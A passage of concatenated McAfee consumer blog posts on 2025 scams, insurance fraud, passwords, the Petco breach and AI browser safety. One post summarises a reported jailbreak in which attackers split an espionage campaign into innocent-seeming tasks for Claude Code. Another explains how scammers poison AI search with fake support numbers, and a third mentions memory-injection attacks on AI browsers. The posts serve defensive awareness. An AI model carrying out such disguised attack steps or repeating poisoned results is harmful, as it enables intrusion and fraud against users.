    Comprehensive online protection software can secure your phone in the same ways that it secures your laptops and computers. Installing it can protect your privacy, keep you safe from attacks on public Wi-Fi, automatically block unsafe websites and links, and detect scams, just to name a few things it can do.

    1. Update your phone’s operating system.

    Along with installing security software, keeping your phone’s operating system up to date can greatly improve your security. Updates can fix vulnerabilities that hackers rely on to pull off their malware-based attacks. It’s another tried-and-true method of keeping yourself safe—and for keeping your phone running great too.

    1. Avoid third-party app stores.

    Google Play and Apple’s App Store have measures in place to review and vet apps to help ensure that they are safe and secure. Third-party sites might very well not, and they might intentionally host malicious apps as part of a front. Further, Google and Apple are quick to remove malicious apps from their stores when discovered, making shopping there safer still.

    The post Black or Scrambled Phone Screen? Here’s How to Spot a Hacked vs Broken Phone appeared first on McAfee Blog.

    This Year in Scams: A 2025 Retrospective, and a Look Ahead at 2026

    By: McAfee
    The Top Scams of 2025

    They came by phone, by text, by email, and they even weaseled their way into people’s love lives—an entire host of scams that we covered here in our blogs throughout the year.

    Today, we look back, picking five noteworthy scams that firmly established new trends, along with one in particular that gives us a hint at the face of scams to come.

    Let’s start it off with one scam that pinged plenty of phones over the spring and summer: those toll road texts.

    1 – The Texts That Jammed Everyone’s Phones: The Toll Road Scam

    It was the hot new scam of 2025 that increased by 900% in one year: the toll road scam.

    There’s a good chance you got a few of these this year,scam texts that say you have an unpaid tab for tolls and that you need to pay right away. And as always, they come with a handy link where you can pay up and avoid that threat of a “late fee.”

     

    Of course, links like those took people to phishing sites where people gave scammers their payment info, which led to fraudulent charges on their cards. In some instances, the scammers took it a step further by asking for driver’s license and Social Security numbers, key pieces of info for big-time identity theft.

    Who knows what the hot new text scam for 2026 will be, yet here are several ways you can stop text scams in their tracks, no matter what form they take:

    How Can I Stop Text Scams?

    Don’t click on any links in unexpected texts (or respond to them, either). Scammers want you to react quickly, but it’s best to stop and check it out.

    Check to see if the text is legit. Reach out to the company that apparently contacted you using a phone number or website you know is real—not the info from the text.

    Get our Scam Detector. It automatically detects scams by scanning URLs in your text messages. If you accidentally tap or click? Don’t worry, it blocks risky sites if you follow a suspicious link.

    2 – Romancing the Bot: AI Chatbots and Images Finagle Their Way Into Romance Scams

    It started with a DM. And a few months later, it cost her $1,200.

    Earlier this year, we brought you the story of 25-year-old computer programmer Maggie K. who fell for a romance scam on Instagram. Her story played out like so many. When she and her online boyfriend finally agreed to meet in person, he claimed he missed his flight and needed money to rebook. Desperate to finally see him, she sent the money and never heard from him again.

    But here’s the twist—he wasn’t real in the first place.

    When she reported the scam to police, they determined his images were all made with AI. In Maggie’s words, “That was the scariest part—I had trusted someone who never even existed.”

    Maggie isn’t alone. Our own research earlier this year revealed that more than half (52%) of people have been scammed out of money or pressured to send money or gifts by someone they met online.

    Moreover, we found that scammers have fueled those figures with the use of AI. Of people we surveyed, more than 1 in 4 (26%) said they—or someone they know—have been approached by an AI chatbot posing as a real person on a dating app or social media.

    We expect this trend will only continue, as AI tools make it easier and more efficient to pull off romance scams on an increasingly larger scale.

    Even so, the guidelines for avoiding romance scams remain the same:

    • Never send money to someone you’ve never met in person.
    • Things move too fast, too soon—like when the other person starts talking about love almost right away.
    • They say they live far away and can’t meet in person because they live abroad, all part of a scammers story that they’re there for charity or military service.
    • Look out for stories of urgent financial need, such as sudden emergencies or requests for help with travel expenses to meet you.
    • Also watch out for people who ask for payment in gift cards, crypto, wire transfers, or other forms of payment that are tough to recover. That’s a sign of a scam.

    3 – Paying to Get Paid: The New Job Scam That Raked in Millions

    The job offer sounds simple enough … go online, review products, like videos, or do otherwise simple tasks and get paid doing it—until it’s time to get paid.

    It’s a new breed of job scam that took root this spring, one where victims found themselves “paying to get paid.”

    The FTC dubbed these scams as “gamified job scams” or “task scams.” Given the way these scams work, the naming fits.

    It starts with a text or direct message from a “recruiter” offering work with the promise of making good money by “liking” or “rating” sets of videos or product images in an app, all with the vague purpose of “product optimization.” With each click, you earn a “commission” and see your “earnings” rack up in the app. You might even get a payout, somewhere between $5 and $20, just to earn your trust.

    Then comes the hook.

    Like a video game, the scammer sweetens the deal by saying the next batch of work can “level up” your earnings. But if you want to claim your “earnings” and book more work, you need to pay up. So you make the deposit, complete the task set, and when you try to get your pay the scammer and your money are gone. It was all fake.

    This scam and others like it fall right in line with McAfee data that uncovered a spike in job-related scams of 1,000% between May and July,which undoubtedly built on 2024’s record-setting job scam losses of $501 million.

    Whatever form they take, here’s how you can avoid job scams:

    Step one—ignore job offers over text and social media

    A proper recruiter will reach out to you by email or via a job networking site. Moreover, per the FTC, any job that pays you to “like” or “rate” content is against the law. That alone says it’s a scam.

    Step two—look up the company

    In the case of job offers in general, look up the company. Check out their background and see if it matches up with the job they’re pitching. In the U.S., The Better Business Bureau (BBB) offers a list of businesses you can search.

    Step three—never pay to start a job.

    Any case where you’re asked to pay to up front, with any form of payment, refuse, whether that’s for “training,” “equipment,” or more work. It’s a sign of a scam.

    4 – Seeing is Believing is Out the Window: The Al Roker Deepfake Scam

    Prince Harry, Taylor Swift, and now the Today show’s Al Roker, too, they’ve all found themselves as the AI-generated spokesperson for deepfake scams.

    In the past, a deepfake Prince Harry pushed bogus investments, while another deepfake of Taylor Swift hawked a phony cookware deal. Then, this spring, a deepfake of Al Roker used his image and voice to promote a bogus hypertension cure—claiming, falsely, that he had suffered “a couple of heart attacks.”

     

    The fabricated clip appeared on Facebook, which appeared convincing enough to fool plenty of people, including some of Roker’s own friends. “I’ve had some celebrity friends call because their parents got taken in by it,” said Roker.

    While Meta quickly removed the video from Facebook after being contacted by TODAY, the damage was done. The incident highlights a growing concern in the digital age: how easy it is to create—and believe—convincing deepfakes.

    Roker put it plainly, “We used to say, ‘Seeing is believing.’ Well, that’s kind of out the window now.”

    In all, this stands as a good reminder to be skeptical of celebrity endorsements on social media. If public figure fronts an apparent deal for an investment, cookware, or a hypertension “cure” in your feed, think twice. And better yet, let our Scam Detector help you spot what’s real and what’s fake out there.

    5 – September 2025: The First Agentic AI Attack Spotted in The Wild

    And to close things out, a look at some recent news, which also serves as a look ahead.

    Last September, researchers spotted something unseen before:a cyberattack almost entirely run by agentic AI.

    What is Agentic AI?

    Definition: Artificial intelligence systems that can independently plan, make decisions, and work toward specific goals with minimal human intervention; in this way, it executes complex tasks by adapting to new info and situations on its own.

    Reported by AI researcher Anthropic, a Chinese state-sponsored group allegedly used the company’s Claude Code agent to automate most of an espionage campaign across nearly thirty organizations. Attackers allegedly bypassed guardrails that typically prevent such malicious use with jailbreaking techniques, which broke down their attacks into small, seemingly innocent tasks. That way, Claude orchestrated a large-scale attack it wouldn’t otherwise execute.

    Once operational, the agent performed reconnaissance, wrote exploit code, harvested credentials, identified high-value databases, created backdoors, and generated documentation of the intrusion. By Anthropic’s estimate, they completed 80–90% of the work without any human involvement.

    According to Anthropic: “At the peak of its attack, the AI made thousands of requests, often multiple per second—an attack speed that would have been, for human hackers, simply impossible to match.”

    We knew this moment was coming, and now the time has arrived: what once took weeks of human effort to execute a coordinated attack now boils down to minutes as agentic AI does the work on someone’s behalf.

    In 2026, we can expect to see more attacks led by agentic AI, along with AI-led scams as well, which raises an important question that Anthropic answers head-on:

    If AI models can be misused for cyberattacks at this scale, why continue to develop and release them? The answer is that the very abilities that allow Claude to be used in these attacks also make it crucial for cyber defense. When sophisticated cyberattacks inevitably occur, our goal is for Claude—into which we’ve built strong safeguards—to assist cybersecurity professionals to detect, disrupt, and prepare for future versions of the attack.

    That gets to the heart of security online: it’s an ever-evolving game. As new technologies arise, those who protect and those who harm one-up each other in a cycle of innovation and exploits. As we’re on the side of innovation here, you can be sure we’ll continue to roll out protections that keep you safer out there. Even as AI changes the game, our commitment remains the same.

    Happy Holidays!

    We’re taking a little holiday break here and we’ll be back with our weekly roundups again in 2026. Looking forward to catching up with you then and helping you stay safer in the new year.

    The post This Year in Scams: A 2025 Retrospective, and a Look Ahead at 2026 appeared first on McAfee Blog.

    How To Spot Health Insurance Scams This Open Enrollment Season

    By: McAfee

    If you’re in the market for insurance right now, keep an eye out for scammers in the mix. They’re out in full force once again this open enrollment season.

    As people across the U.S. sign up for, renew, or change their health insurance plans, scammers want to cash in as people rush to get their coverage set. And scammers have several factors working in their favor.

    For starters, many people find the insurance marketplace confusing, frustrating, and even intimidating, all feelings that scammers can take advantage of. Moreover, concerns about getting the right level of coverage at an affordable price also play into the hands of scammers.

    Amidst all this uncertainty and time pressure, health insurance scams crop up online. Whether under the guise of helping people navigate the complex landscape or by offering seemingly low-cost quotes, scammers prey on insurance seekers by stealing their personal information, Social Security numbers, and money.

    According to the FBI, health insurance scams cost families millions each year. In some cases, the costs are up front. People pay for fraudulent insurance and have their personal info stolen. And for many, the follow-on costs are far worse, where victims go in for emergency care and find that their treatment isn’t covered—leaving them with a hefty bill.

    Like so many of the scams we cover here in our blogs, you can spot health insurance scams relatively quickly once you get to know their ins and outs.

    What Kind Of Health Insurance Scams Are Out There Right Now?

    Here’s how some of those scams can play out.

    The Phishing Strategy

    Some are “one and done scams” where the scammer promises a policy or service and then disappears after stealing money and personal info—much like an online shopping scam. It’s a quick and dirty hit where scammers quickly get what they want by reaching victims the usual ways, such as through texts, emails, paid search results, and social media. In the end, victims end up on a phishing site where they think they’re locking in a good deal but handing over their info to scammers instead.

    The Long Con

    Other scams play a long con game, milking victims for thousands and thousands of dollars over time. The following complaint lodged by one victim in Washington state provides a typical example:

    A man purchased a plan to cover himself, his wife, and his two children, only to learn there was no coverage. He was sold a second policy, with the same result, and offered a refund if he purchased a third policy. When he filed a complaint, his family still had no coverage, and he was seeking a refund for more than $20,000 and reimbursement for $55,000 in treatments and prescriptions he’d paid out of pocket.

    Scams like these are known as ghost broker scams where scammers pose as insurance brokers who take insurance premiums and pocket the money, leaving victims thinking they have coverage when they don’t. In some cases, scammers initially apply for a genuine policy with a legitimate carrier, only to cancel it later, while still taking premiums from the victim as their “broker.” Many victims only find out that they got scammed when they attempt to file a claim.

    The “Fake” Cancellation Scam

    Another type of scam comes in the form of policy cancellation scams. These work like any number of other account-based scams, where a scammer pretends to be a customer service rep at a bank, utility, or credit card company. In the insurance version of it, scammers email, text, or call with some bad news—the person’s policy is about to get cancelled. Yet not to worry, the victim can keep the policy active they hand over some personal and financial info. It’s just one more way that scammers use urgency and fear to steal to commit identity theft and fraud.

    What Are The Signs Of A Health Insurance Scam?

    As said, health insurance scams become relatively easy to spot once you know the tricks that scammers use. The Federal Trade Commission (FTC) offers up its list of the ones they typically use the most:

    1)Someone says they’re from the government and need money or your personal info.Government agencies don’t call people out of the blue to ask them for money or personal info. No one from the government will ask you to verify your Social Security, bank account, or credit card number, and they won’t ask you to wire money or pay by gift card or cryptocurrency.

    If you have a question about Health Insurance Marketplace®, contact the government directly at: HealthCare.gov or 1-800-318-2596

    2) Someone tries to sell you a medical discount plan. Legitimate medical discount plans differ from health insurance. They supplement it. In that way, they don’t pay for any of your medical expenses. Rather, they’re membership programs where you pay a recurring fee for access to a network of providers who offer their services at pre-negotiated, reduced rates. The FTC strongly advises thorough research before participating in one, as some take people’s money and offer very little in return. Call your caregiver and see if they really participate in the program and in what way. And always review the details of any medical discount plan in writing before you sign up.

    3) Someone wants your sensitive personal info in exchange for a price quote. The Affordable Care Act’s (ACA’s) official government site is HealthCare.gov. It lets you compare prices on health insurance plans, check your eligibility for healthcare subsidies, and begin enrollment. But HealthCare.gov will only ask for your monthly income and your age to give you a price quote. Never enter personal financial info like your Social Security number, bank account, or credit card number to get a quote for health insurance.

    4) Someone wants money to help you navigate the Health Insurance Marketplace. The people who offer legitimate help with the Health Insurance Marketplace (sometimes called Navigators or Assisters) are not allowed to charge you and won’t ask you for personal or financial info. If they ask for money, it’s a scam. Go to HealthCare.govand click “Find Local Help” to learn more.

    How to Avoid Health Insurance Scams

    1)For health insurance, visit a trusted source like HealthCare.gov or your state marketplace. Doing so helps guarantee that you’ll get the kind of fully compliant coverage you want.

    2) Make sure the insurance covers you in your state. Not every insurer is licensed to operate in your state. Double-check that the one you’re dealing with is. A good place to start is to visit the site for your state’s insurance commission. It should have resources that let you look up the insurance companies, agents, and brokers in your state.

    3) For any insurance, research the company offering it. Run a search with the company name and add “scam” or “fraud” to it. See if any relevant news or complaints show up. And if the plan you’re being offered sounds too good to be true, it probably is.

    4) Watch out for high-pressure sales. Don’t pay anything up front and be cautious if a company is forcing you to make quick decisions.

    5) Guard your personal info. Never share your personal info, account details, or Social Security number over text or email. Make sure you’re really working with a legitimate company and that you submit any info through a secure submissions process.

    6) Block bad links to phishing sites. Many insurance scams rely on phishing sites to steal personal info. A  combination of our Web Protection and Scam Detector can steer you clear of them. They’ll alert you if a link might take you to one. It’ll also block those sites if you accidentally tap or click on a bad link.

    7) Monitor your identity and credit. In some health insurance scams, your personal info winds up in wrong hands, which can lead to identity fraud and theft. And the problem is that you only find out once the damage is done. Actively monitoring your identity and credit can spot a problem before it becomes an even bigger one. You can take care of both easily with our identity monitoring and credit monitoring.

    Additionally, our identity theft coverage can help if the unexpected happens with up to $2 million in identity theft coverage and identity restoration support if determined you’re a victim of identity theft.​

    You’ll find these protections and more in McAfee+.

    The post How To Spot Health Insurance Scams This Open Enrollment Season appeared first on McAfee Blog.

    Why “Strong Passwords” Aren’t Enough Anymore—and What to Do Instead

    By: McAfee

    Imagine a day where you didn’t have to juggle passwords.

    No more sticky notes. No more notebooks with dozens of passwords scribbled in, crossed out, and scribbled in again. No more forgetting and resetting. No more typing them in all the time.

    And even better, imagine secure accounts, likely even more secure than you could keep them on your own.

    That’s the power of a password manager in your life.

    A password manager does the work of creating strong, unique passwords for each and every one of your accounts. And considering the hundred or so accounts you have, that’s something that would take plenty of time if you did all that work on your own.

    In all, a password manager can turn the pain of juggling passwords into a real comfort.

    What’s a bad password?

    Before we get into how a password manager can make your life easier while making your accounts more secure, let’s look at what makes up a bad password. Here are a few examples:

    Obvious passwords: Password-cracking programs start by entering a list of common (and arguably lazy) passwords. These may include the simple “password” or “1234567”. Others include common keyboard paths like “qwerty.” Even longer keyboard paths like “qwertyuiop” are well known to hackers and their tools as well. 

    Dictionary words: Hacking tools also look for common dictionary words strung together, which helps them crack longer passwords in chunks. The same goes for passwords that contain the name of the app or service in them. These are “no brainer” words found in passwords that make passwords even easier to crack.

    Repeated passwords: You may think you have such an unbreakable password that you want to use it for all your accounts. However, this means that if hackers compromise one of your accounts, all your other accounts are vulnerable. This is a favorite tactic of hackers. They’ll target less secure accounts and services and then attempt to re-use those credentials on more secure services like online bank and credit card companies. 

    Personal information passwords: Passwords that include your birthday, dog’s name, or nickname leave you open to attack. While they’re easy for you to remember, they’re also easy for a hacker to discover—such as with a quick trip to your social media profile, particularly if it is not set to private.

    If any of the above sounds familiar, you’ll want to replace any of your bad passwords with strong ones.

    What’s a good password?

    We can point to three things that make up a strong password, which makes it difficult to hack.

    Your password is:

    Long: A longer password is potentially a stronger password when it comes to a “brute force” attack, where a hacker uses an automated trial-and-error system to break it. For example, an eight-character password using uppercase and lowercase letters, numbers, and symbols can get hacked in minutes. Kick it up to 16 characters and it becomes incredibly more difficult to break—provided it doesn’t rely on common words or phrases. McAfee can help you generate a strong password, for stronger security with our random password generator.

    Complex: To increase the security of your password, it should have a combination of uppercase letters, lowercase letters, symbols, and numbers like mentioned above.

    Unique: Every one of your accounts should have its own password.

    Now, apply this to the hundred or so accounts you keep and creating strong passwords for all of them really does call for a lot of work.

    Should I use a password manager?

    Given its ease of use and the big security boost it gives you and all your accounts, the answer is yes.

    A password manager does the work of creating strong, unique passwords for your accounts. These will take the form of a string of random numbers, letters, and characters. They won’t be memorable, but the manager does the memorizing for you. You only need to remember a single password to access the tools of your manager.

    A strong password manager also stores your passwords securely. Our password manager protects your passwords by scrambling them with AES-256, one of the strongest encryption algorithms available. Only you can decrypt and access your info with the factors you choose. Additionally, our password manager uses multi-factor authentication (MFA), so you’ll be verified by at least two factors before being signed in.

    Aside from the comfort of convenience a password manager can give you, it gives you another level of assurance—extra protection in an age of data breaches, because you’ll have unique passwords where one compromise won’t lead to others.

    And whether or not you go with a password manager to create those strong and unique passwords, make sure you use MFA on every account that offers it. MFA offers another layer of protection by adding another factor into the login process, such as something you own like a text to your phone or notification to an authentication app. That way if a hacker has your password, they’ll still be locked out of your account because they lack that MFA code.

    One more smart move: delete your old accounts

    In some cases, you really don’t need some of your old accounts and the passwords that come along with them. Maybe they’re old and unused. Or maybe they were for a one-time purchase at an online store you won’t visit again. Deleting these accounts is a smart move because they’re yet more places where your personal info is stored—and subject to a data breach.

    Our Online Account Cleanup can help, which you can find in all our McAfee+ plans. It scans for accounts in your name, gives you a full list, and shows you which types of accounts might be riskier than others. From there you can decide which ones you want to delete, along with the personal info linked to them. In our McAfee+ Ultimate plans, you get full-service Online Account Cleanup, which sends the data deletion requests for you.

    Between this and a password manager, you’ll have one less thing to juggle—your passwords, and one less thing to worry about—if they’re secure from hackers.

    The post Why “Strong Passwords” Aren’t Enough Anymore—and What to Do Instead appeared first on McAfee Blog.

    This Week in Scams: Petco Breach Warning, and Watch Out for Fake Federal Calls

    By: McAfee
    A dog in a sweater on a walk.

    Pets, poisoned AI search results, and a phone call that sounds like it’s coming straight from the federal government, this week’s scams don’t have much in common except one thing: they’re getting harder to spot.

    In today’s edition of This Week in Scams, we’re breaking down the biggest security lapses and the tactics scammers used to exploit them, and what you can do to stay ahead of the latest threats.

    Two data security lapses discovered at Petco in one week put pet parents at risk

    If you’re a Petco customer, you’ll want to know about not one but two data security lapses in the past week.

    First, as reported by TechCrunch on Monday, Petco followed Texas data privacy laws by filing a data breach with the attorney general’s office. In that filing, Petco reported that the affected data included names, Social Security numbers, and driver’s license numbers. Further info including account numbers, credit and debit card numbers, and dates of birth were also mentioned in the filing.

    Also according to Techcrunch, the company filed similar notices in California and Massachusetts.

    To date, Petco has not made a comment about the size of the breach and the number of people affected.

    Different states have different policies for reporting data breaches. In some cases, that helps us put a figure to the size of the breach, as some states require companies to disclose the total number of people caught up in the breach. That’s not the case here, so the full scope of the attack remains in question, at least for right now.

    As of Thursday, we know Petco reported that 329 Texans were affected along with seven Massachusetts residents, per the respective reports filed. California’s report does not contain the number of Californians affected, yet laws in that state require businesses to report breaches that affect 500 or more people, so at least 500 people were affected there.

    Below you can see the form letter Petco sent to affected Californians in accordance with California’s data privacy laws:

    Copy of the form letter posted on the California Attorney General’s Website
    Copy of the form letter posted on the California Attorney General’s Website

     

    In it, you can see that Petco discovered that “a setting within one of our software applications … inadvertently allowed certain files to become accessible online.” Further, Petco said that it “immediately took steps to correct the issue and to remove the files from further online access,” and that it “corrected” the setting and implemented unspecified “additional security measures.”

    So while no foul play appears to have been behind the breach, it’s still no less risky and concerning for Petco’s customers. We’ll cover what you can do about that in a moment after we cover yet another data issue at Petco through its Vetco clinics.

    Also within the same timeframe, yet more research and reporting from Techcrunch uncovered a second security lapse that exposed personal info online. From their article:

    “TechCrunch identified a vulnerability in how Vetco’s website generates copies of PDF documents for its customers.

    “Vetco’s customer portal, located at petpass.com, allows customers to log in and obtain veterinary records and other documents relating to their pet’s care. But TechCrunch found that the PDF generating page on Vetco’s website was public and not protected with a password.

    “As such, it was possible for anyone on the internet to access sensitive customer files directly from Vetco’s servers by modifying the web address to input a customer’s unique identification number. Vetco customer numbers are sequential, which means one could access other customers’ data simply by changing a customer number by one or two digits.”

    What to do if you think you had info stolen in the Petco breach

    With the size and reach of the Petco breach still unknown, and the impact of the Vetco security lapse also unknown, we advise caution for all Petco customers. At minimum, monitor transactions and keep an eye on your credit report for any suspicious activity. And it’s always a good time to update a weak password.

    For those who received a notification, we advise the following:

    Check your credit, consider a security freeze, and get ID theft protection. You can get all three working for you with McAfee+ Advanced or McAfee+ Ultimate.

    Monitor transactions across your accounts, also available in McAfee+ Advanced and Ultimate.

    Keep an eye out for phishing attacks. Use our Scam Detector to spot any follow-on attacks.

    Update your passwords. Strong and unique passwords are best. Our password manager can help you create and store them securely.

    And use two-factor authentication on all your accounts. Enabling two-factor authentication provides an added layer of security.

    Image Credit: Federal Register
    Image Credit: Federal Register

     

    What to do if your Social Security number was breached.

    If you think your Social Security number was caught up in the breach, act quickly.

    1. First, contact one of the three credit bureaus (Equifax, Experian, or TransUnion) and place a fraud alert on your credit report.
    2. That will cover all three bureaus and make it harder for someone to open new accounts in your name. You can also quickly freeze your credit altogether with McAfee+ Ultimate.
    3. Also notify the Social Security Administration (SSA) along with the Internal Revenue Service (IRS), and file a police report immediately if you believe your number is being misused.

    The call center number that connects you to … scammers?

    You might want to be careful when searching for customer service numbers while in AI mode. Or with an AI search engine. It could connect you to a scammer.

    From The Times comes reports of scammers manipulating the AI in platforms like Google and Perplexity so that their search results return scam numbers instead of a proper customer service numbers for, say, British Airways.

    How do they manipulate those results? By spamming the internet with false info that gets picked up and then amplified by AI.

    “[S]cammers have started seeding fake call center numbers on the web so the AI is tricked into thinking it is genuine …

    “Criminals have set up YouTube channels with videos claiming to help with customer support, which are packed with airline brand names and scam numbers designed to be scraped and reused by the AI.

    “Bot-generated reviews on Yelp or video descriptions on YouTube are filled with fraudulent numbers as are airline and travel web forums.”

    And with these tactics, scammers could poison the results for just about any organization, business, or brand. Not just airlines. Per The Times, “The scammers have also hijacked government sites, university domains, and even fitness sites to place scam numbers, which fools the AI into thinking they are genuine.”

    This reveals a current limitation with many AI platforms. Largely they can’t distinguish when people deliberately feed them bad info, as seen in the case here.

    Yet even as this attack is new, our advice remains the same: any time you want to ring up a customer service line, get the number directly from the company’s official website. Not from AI search and not by clicking a paid search result that shows up first (scammers can poison them too).

    Is that a call from an FTC “agent?” If so, it’s a scam.

    Are you under investigation for money laundering? Of course not. But this scam wants you to think so—and to pay up.

    On Tuesday, the Federal Trade Commission (FTC) issued a consumer alert warning that people are reporting getting unexpected calls from someone saying they’re “FTC agent” John Krebs. Apparently “Agent Krebs” is telling people that they’re under investigation for money laundering—and that a deposit to a Bitcoin ATM can resolve the matter.

    Of course, it’s a scam.

    For starters, the FTC doesn’t have “agents.” And the idea of clearing one’s name in an investigation with a Bitcoin payment is a sure-fire sign of a scam. Lastly, any time someone asks for payment with Bitcoin or other payment methods that are near-impossible to recover (think wire transfers and gift cards), those are big red flags.

    Apart from hanging up and holding on to your money, the FTC offers the following guidance, which holds true for any scam call:

    • Never transfer or send money to anyone in response to an unexpected call or message, no matter who they say they are.
    • Know that the FTC won’t ask for money. In fact, no government agency will ever tell you to deposit money at a cryptocurrency ATM, buy gift cards and share the numbers, or send money over a payment app like Zelle, Cash App, or Venmo.
    • Don’t trust your caller ID. A call might look like it’s coming from the government or a business, but scammers often fake caller ID.

    And we close things out a quick roundup …

    As always, here’s a quick list of a few stories that caught our eye this week:

    AI tools transform Christmas shopping as people turn to chatbots

    National cybercrime network operating for 14 years dismantled in Indonesia

    Why is AI becoming the go-to support for our children’s mental health?

    We’ll see you next Friday with a special edition to close out 2025 … This Year in Scams.

    The post This Week in Scams: Petco Breach Warning, and Watch Out for Fake Federal Calls appeared first on McAfee Blog.

    How to Stay Safe on Your New AI Browser

    By: McAfee

    AI-powered browsers give you much more than a window to the web. They represent an entirely new way to experience the internet, with an AI “agent” working by your side.

    We’re entering an age where you can delegate all kinds of tasks to a browser, and with that comes a few things you’ll want to keep in mind when using AI browsers like ChatGPT’s Atlas, Perplexity’s Comet, and others.

    What are agentic AI browsers?

    So, what’s the allure of this new breed of browser? The answer is that it’s highly helpful, and plenty more.

    By design, these “agentic” AI browsers actively assist you with the things you do online. They can automate tasks and interpret your intentions when you make a request. Further, they can work proactively by anticipating things you might need or by offering suggestions.

    In a way, an AI browser works like a personal assistant. It can summarize the pages in several open tabs, conduct research on just about any topic you ask it to, or even track down the lowest airfare to Paris in the month of May. Want it to order ink for your printer and some batteries for your remote? It can do that too. And that’s just to name a few possibilities.

    As you can see, referring to the AI in these browsers as “agentic” fits. It truly works like an agent on your behalf, a capability that promises to get more powerful over time.

    Is it safe to use an AI browser?

    But as with any new technology, early adopters should balance excitement with awareness, especially when it comes to privacy and security. You might have seen some recent headlines that shared word of security concerns with these browsers.

    The reported exploits vary, as does the harm they can potentially inflict. That ranges from stealing personal info, gaining access to Gmail and Google Drive files, installing malware, and injecting the AI’s “memory” with malicious instructions, which can follow from session to session and device to device, wherever a user logs in.

    Our own research has shown that some of these attacks are now tougher to pull off than they were initially, particularly as the AI browser companies continue to put guardrails in place. If anything, this reinforces a long-standing truth about online security, it’s a cat-and-mouse game. Tech companies put protections in place, bad actors discover an exploit, companies put further protections in place, new exploits crop up, and so on. It’s much the same in the rapidly evolving space of AI browsers. The technology might be new, but the game certainly isn’t.

    While these reports don’t mean AI browsers are necessarily unsafe to use, they do underscore how fast this space is evolving…and why caution is smart as the tech matures.

    How To Use an AI Browser Safely

    It’s still early days for AI-powered browsers and understanding the security and privacy implications of their use. With that, we strongly recommend the following to help reduce your risk:

    Don’t let an AI browser do what you wouldn’t let a stranger do. Handle things like your banking, finances, and health on your own. And the same certainly goes for all the info tied to those aspects of your life.

    Pay attention to confirmations. As of today, agentic browsers still require some level of confirmation from the user to perform key actions (like processing a payment, sending an email, or updating a calendar entry). Pay close attention to them, so you can prevent your browser from doing something you don’t want it to do.

    Use the “logged out” mode, if possible. As of this writing, at least one AI browser, Atlas, gives you the option to use the agent in the logged-out mode.i This limits its access to sensitive data and the risk of it taking actions on your behalf with your credentials.

    If possible, disable “model learning.” By turning it off, you reduce the amount of personal info stored and processed by the AI provider for AI training purposes, which can minimize security and privacy risks.

    Set privacy controls to the strictest options available. Further, understand what privacy policies the AI developer has in place. For example, some AI providers have policies that allow people to review your interactions with the AI as part of its training. These policies vary from company to company, and they tend to undergo changes. Keeping regular tabs on the privacy policy of the AI browser you use makes for a privacy-smart move.

    Keep yourself informed. The capabilities, features, and privacy policies of AI-powered browsers continue to evolve rapidly. Set up news alerts about the AI browser you use and see if any issues get reported and, if so, how the AI developer has responded. Do routine searches pairing the name of the AI browser with “privacy.”

    How McAfee Can Help

    McAfee’s award-winning protection helps you browse safer, whether you’re testing out new AI tools or just surfing the web.

    McAfee offers comprehensive privacy services, including personal info scans and removal plus a secure VPN.

    Plus, protections like McAfee’s Scam Detector automatically alert you to suspicious texts, emails, and videos before harm can happen—helping you manage your online presence confidently and safeguard your digital life for the long term. Likewise, Web Protection can help you steer you clear of suspicious websites that might take advantage of AI browsers.

    The post How to Stay Safe on Your New AI Browser appeared first on McAfee Blog.

    What Is Internet Security?

    By: McAfee

    Internet security refers to the tactics that protect your online activities from various cyber threats, including malware, phishing attacks, scams, and unauthorized access by hackers. In this article, we will highlight the importance of internet security in safeguarding your digital network and outline the steps you can take to establish a comprehensive online security system.

    Why internet security matters

    Internet usage has become central to our daily lives. In 2024 alone, DataReportal reported that around 5.56 billion, that’s 67.9% of the world’s population, were connected to the internet. This was 136 million more than the year before, resulting in the creation of approximately 402.7 million terabytes of data each day. With this wealth of information, it is no wonder that cybercriminals are scrambling to make billions of dollars off the internet.

    Globally, the average cost of data breaches rose by 10% between 2023 and 2024, totaling an estimated $4.88 million. This staggering amount included not only the loss in business revenues but also recovery costs and regulatory fines. For this reason, it has become important to implement internet security to protect our online personal data, activities, and devices from cyber threats and unauthorized access.

    While internet security is sometimes confused with it, it’s important to point out their subtle distinctions. Internet security focuses on protecting your activities and data as they travel across the web. In contrast, cybersecurity focuses on protecting digital assets, including systems, networks, and data, from cyber threats. These two concepts work together to create your complete digital protection environment.

    The importance of internet security

    Internet security threats come in a variety of forms, complexities, and detectability. Some of the common threats we face today include:

    • Malware: Malicious software is an umbrella term that refers to any program that exploits system vulnerabilities to damage a computer system or network and steal sensitive information from users. Examples of malware include viruses, Trojans, ransomware, spyware, and worms.
    • Phishing: Phishing is a social engineering scam that involves stealing a user’s sensitive data by deceiving them into opening an email or an instant message and clicking a malicious link or attachment. The data that cybercriminals target can range from login credentials to credit card numbers and other sensitive information. You may unknowingly provide access codes to fake tech support or transfer money to scammers posing as family members in emergency situations. Phishing attacks are often used for identity theft purposes.
    • Spam: Spam refers to unwanted email messages sent in bulk to your email inbox. This tactic is generally used to promote goods and services that users aren’t interested in. Spam emails can also contain links to malicious websites that automatically install harmful programs that help hackers gain access to your data.
    • Botnets: This contraction of “robot network” refers to a network of computers that have been infected with malware. The computers are then prompted to perform automated tasks without permission, such as sending spam and carrying out denial-of-service (DDoS) attacks.
    • Wi-Fi threats: Hackers exploit unprotected public Wi-Fi connections to breach data security and obtain sensitive information, including login credentials, emails, and browsing activity. Your personal information could be stolen when you check your email, shop online, or access your bank accounts on public networks.
    • Ransomware: This malicious software locks your files and demands payment for their release. You could lose precious family photos, important documents, or access to your devices until you pay, with no guarantee you’ll get your files back. The FBI reported nearly $12.5 billion in ransomware losses in 2024.
    • Credential stuffing: Cybercriminals use automated tools to test stolen username and password combinations across multiple sites, hoping you’ve reused the same login credentials. This can give hackers access to your online banking, shopping accounts, and social media profiles.
    • Account takeovers: When criminals gain control of your online accounts through stolen passwords or security vulnerabilities, they can lock you out while using your accounts for fraudulent activities such as draining your bank account, making unauthorized purchases, or damaging your reputation on social media. In the U.S. alone, approximately 77 million Americans fell victim to account takeover fraud in 2024.
    • Browser hijacking: This occurs when unwanted software changes your browser settings, redirecting you to malicious websites, flooding you with unwanted ads and pop-ups, then stealing your information or installing more malware on your device. A recent investigation revealed that at least 16 malicious extensions in Chrome alone have affected over 3.2 million users.

    While internet security threats may seem overwhelming at first glance, solutions are available to safeguard your computer or mobile devices. Below is a detailed look at some security measures.

    Network security basics

    Your home network serves as the foundation of your digital life, connecting all your devices and enabling your online activities. Having a strong network security foundation with multiple layers of protection will keep your connections and data safe from cyber threats.

    Secure the router

